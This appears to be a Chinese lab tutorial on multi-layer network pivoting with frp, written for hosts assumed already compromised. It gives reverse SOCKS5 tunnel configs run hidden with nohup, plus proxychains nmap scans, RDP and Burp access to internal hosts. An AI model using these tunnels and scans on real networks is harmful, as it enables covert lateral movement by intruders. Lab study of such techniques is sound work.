文章目录
0x01背景介绍
-
- 0x01背景介绍
- 0x02 frp一层代理(反向)
-
- 服务端(server)
- 客户端 (client)
- 0x03 frp二层代理
-
- 客户端 (client)
- 0x04 测试连接
- 摘抄
假设:已经获取边界服务器(192.168.0.100)的服务器权限,win7服务器(192.168.52.30)的权限 实现:
- 配置一层代理,访问192.168.52.0/24网段,以便访问第二层网络(192.168.52.30)
- 配置二层代理,访问192.168.93.0/24网段,以便访问第三层网络(192.168.93.30)
- 现在 ubuntu(web1)要充当frp客户端和frp服务端,以便访问第三层网络
kali(192.168.0.107)
frps.ini -------------------------------------- [common] #服务端监听端口,默认7000。监听来自客户端的流量请求 bind_port = 7000 -------------------------------------- 启动 chmod +777 frps ./frps -c ./frps.ini
ubuntu-web1(192.168.0.100)
会将客户端中所有的流量通过本地的一个随机端口转发给vps的7000端口, 我们访问vps的7777端口就相当于访问客户端的7000端口 frpc.ini --------------------- [common] server_addr = 192.168.0.107 server_port = 7000 [plugin_socks] type = tcp remote_port = 7777 plugin = socks5 ---------------------- 启动 chmod +777 frpc nohup ./frpc -c ./frpc.ini >/dev/null 2>&1 &
先启动服务器,在启动客户端
0x03 frp二层代理同时启动二层代理的服务端frps ubuntu-web1(192.168.0.100)
frps.ini -------------------------------------- [common] #服务端监听端口,默认7000。监听来自客户端的流量请求 bind_addr = 192.168.52.10 bind_port = 7000 -------------------------------------- 启动 chmod +777 frps ./frps -c ./frps.ini
web-pc1(192.168.52.30)
会将客户端中所有的流量通过本地的一个随机端口转发给vps的7000端口, 我们访问vps的7777端口就相当于访问客户端的7000端口 frpc.ini --------------------- [common] server_addr = 192.168.52.10 server_port = 7000 [plugin_socks] type = tcp remote_port = 7777 plugin = socks5 ---------------------- 启动 chmod +777 frpc nohup ./frpc -c ./frpc.ini >/dev/null 2>&1 &
kali本地添加proxy配置
vim /etc/proxychains4.conf ---------------------------------- socks5 192.168.0.107 7777 socks5 192.168.52.10 7777 ----------------------------------
第一步 通过代理,使用nmap进行扫描
扫描二层网络 proxychains nmap -Pn -sT -sV -F -O 192.168.52.30
扫描三层网络 proxychains nmap -Pn -sT -sV -F -O 192.168.93.40
第二步 远程连接
proxychains rdesktop 192.168.52.30
proxychains rdesktop 192.168.93.40
第三步 浏览器开启代理,访问内网系统
访问二层网络 socks5 127.0.0.1 7777 http://192.168.52.30:8080/
访问三层网络 启动burp: proxychains burpsuite firfox代理: socks5 127.0.0.1 7777 http 127.0.0.1 8080 访问网站: http://192.168.52.30:8080/ 127.0.0.1:7777--firxfox:8080---192.168.52.10:7777---burp127.0.0.0:8080----发送
使用代理启动burp
浏览器开启burp代理
成功访问
查看后台burp的代理包
历尽千帆,归来仍是少年。经受风雨,坦荡而真诚,温暖而坚韧。 在生活里,明明白白做人,在工作上,勤勤恳恳努力。 不做玻璃心的花瓶,保持韧性,勤奋、坚持,用一颗真诚的心面对生活,才是一个人走向成功,能够屹立不倒的原因。